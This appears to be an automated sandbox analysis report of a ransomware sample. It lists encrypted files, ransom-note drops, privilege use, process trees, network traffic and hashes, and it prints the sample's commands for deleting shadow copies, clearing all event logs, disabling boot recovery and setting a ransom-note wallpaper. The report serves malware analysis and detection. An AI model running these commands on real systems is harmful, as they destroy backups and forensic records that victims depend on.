File opened for modification C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Proof.Culture.msi.16.fr-fr.xml C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-gb\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_invite_18.svg C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarSplashLogo.scale-125.png C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1644 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\SYSTEM32\cmd.exe
PID 1644 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\SYSTEM32\cmd.exe
PID 1644 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\SYSTEM32\cmd.exe
PID 1644 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\SYSTEM32\cmd.exe
PID 1644 wrote to memory of 3456 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\SYSTEM32\cmd.exe
PID 1644 wrote to memory of 3456 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\SYSTEM32\cmd.exe
PID 1644 wrote to memory of 112 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\SYSTEM32\cmd.exe
PID 1644 wrote to memory of 112 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\SYSTEM32\cmd.exe
PID 1644 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\SYSTEM32\cmd.exe
PID 1644 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\SYSTEM32\cmd.exe
PID 352 wrote to memory of 1516 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 352 wrote to memory of 1516 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3456 wrote to memory of 2444 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 3456 wrote to memory of 2444 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2040 wrote to memory of 4740 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2040 wrote to memory of 4740 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 112 wrote to memory of 4104 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 112 wrote to memory of 4104 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1040 wrote to memory of 4900 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1040 wrote to memory of 4900 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1644 wrote to memory of 13656 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1644 wrote to memory of 13656 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 13656 wrote to memory of 13548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 13656 wrote to memory of 13548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 13656 wrote to memory of 13448 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 13656 wrote to memory of 13448 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe

"C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\SYSTEM32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1347122807.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

Country Destination Domain Proto
NL 8.238.177.126:80 tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 126.20.238.8.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 254.152.241.8.in-addr.arpa udp
US 20.189.173.5:443 tcp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 233.141.123.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
NL 8.238.177.126:80 tcp
US 8.8.8.8:53 163.252.72.23.in-addr.arpa udp
NL 8.238.177.126:80 tcp
NL 173.223.113.164:443 tcp
NL 173.223.113.131:80 tcp
US 131.253.33.203:80 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_juma2lqh.xlc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1516-146-0x0000022191340000-0x0000022191362000-memory.dmp

C:\GET_YOUR_FILES_BACK.txt

MD5 064348106157ac3e6972ebe6852f665f
SHA1 4f95549af4873637f05f5f574b93605d30a28dbb
SHA256 876a6444eeb977c6d73be9474d3cc85307a0f68d4b342c2e59913172f80caa2a
SHA512 e121d453c52fa8aabc7a878649bc68dc25a2bd24861c3557c82d8182ea7ac2b9f9921b5caae950901d036dd77a437e65233cbe5add23dc8d2c7446431bb3ab33

memory/1516-793-0x0000022191260000-0x0000022191270000-memory.dmp

memory/1516-832-0x0000022191260000-0x0000022191270000-memory.dmp

memory/1516-1540-0x0000022191260000-0x0000022191270000-memory.dmp

memory/1516-3346-0x00000221A94E0000-0x00000221A96FC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1a11402783a8686e08f8fa987dd07bca
SHA1 580df3865059f4e2d8be10644590317336d146ce
SHA256 9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA512 5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

C:\GET_YOUR_FILES_BACK.txt

MD5 064348106157ac3e6972ebe6852f665f
SHA1 4f95549af4873637f05f5f574b93605d30a28dbb
SHA256 876a6444eeb977c6d73be9474d3cc85307a0f68d4b342c2e59913172f80caa2a
SHA512 e121d453c52fa8aabc7a878649bc68dc25a2bd24861c3557c82d8182ea7ac2b9f9921b5caae950901d036dd77a437e65233cbe5add23dc8d2c7446431bb3ab33

memory/13656-24866-0x000001D6CE290000-0x000001D6CE2A0000-memory.dmp

memory/13656-24868-0x000001D6CE290000-0x000001D6CE2A0000-memory.dmp